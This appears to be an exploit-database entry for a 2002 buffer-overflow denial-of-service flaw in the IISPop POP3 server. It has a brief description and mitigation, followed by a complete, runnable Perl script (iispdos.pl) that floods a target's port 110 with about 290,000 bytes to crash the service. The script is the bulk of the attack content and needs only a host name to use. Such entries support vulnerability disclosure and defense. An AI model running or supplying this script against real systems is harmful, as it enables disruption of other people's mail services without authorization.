IISPop Denial of Service Vulnerability

vendor:

IISPop

by:

tool : iispdos.pl, greetz crack.fr , marocit ,christal

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: IISPop

Affected Version From: All

Affected Version To: All

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

IISPop Denial of Service Vulnerability

IISPop is vulnerable to a denial of service caused by a buffer overflow. By sending an unusually large amount of data to IISPop on TCP port 110, the application will terminate with an access violation. Arbitrary code execution may be possible.

Mitigation:

Ensure that the application is not exposed to untrusted input that could cause a buffer overflow.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6183/info

IISPop is vulnerable to a denial of service caused by a buffer overflow. By sending an unusually large amount of data to IISPop on TCP port 110, the application will terminate with an access violation. Arbitrary code execution may be possible.

#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#

use IO::Socket;

$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
print "\tUsage: perl iispdos.pl <host> \n";
exit;
}

$remo = $ARGV[0];
$buffer = "A" x 289999;

print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $remo,
PeerPort
=> "110"))
{
print "-->";
print "\tConnection Failed...\n";
exit;
}
print $so "$buffer\n";
close $so;

print "-->";
print "\tnow test if the distant host is down\n";
exit;